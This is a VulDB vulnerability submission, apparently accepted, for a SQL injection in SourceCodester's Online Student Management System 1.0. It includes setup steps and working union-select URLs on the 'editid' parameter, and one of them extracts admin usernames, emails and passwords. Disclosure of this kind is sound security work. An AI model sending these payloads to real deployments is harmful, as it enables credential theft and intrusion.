| 标题 | eduAuthorities sql Injection |
|---|
| 描述 | Download link: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
Version environment:
php=7.3.4
Mysql=5.7.26
Apache=2.4.39
Preparation:
Create a "student" database in mysql.
Set the database username and password in "dbconnection.php", and then access http://localhost/eduauth/index.php to log in with the account and password.
Vulnerability:
http://localhost/eduauth/edit-class-detail.php?editid=1
On line 54 of the "edit-class-detail.php" file, the parameter "editid" is not filtered and can be directly exploited.
http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName),3,4%20from%20tbladmin#
You can see that data information is returned.
Poc:
http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName,'~',Email,'·',Password),3,4%20from%20tbladmin#
Vulnerability principle:
Check the "edit-class-edit-detail.php" file.
On line 55, the user input parameter "editid" is directly concatenated into the SQL statement, and on line 57, a query is performed. |
|---|
| 用户 | 0chen (UID 41914) |
|---|
| 提交 | 2023-02-28 08時35分 (3 年前) |
|---|
| 管理 | 2023-02-28 21時03分 (12 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 222002 [SourceCodester Online Student Management System 1.0 edit-class-detail.php editid SQL注入] |
|---|
| 积分 | 17 |
|---|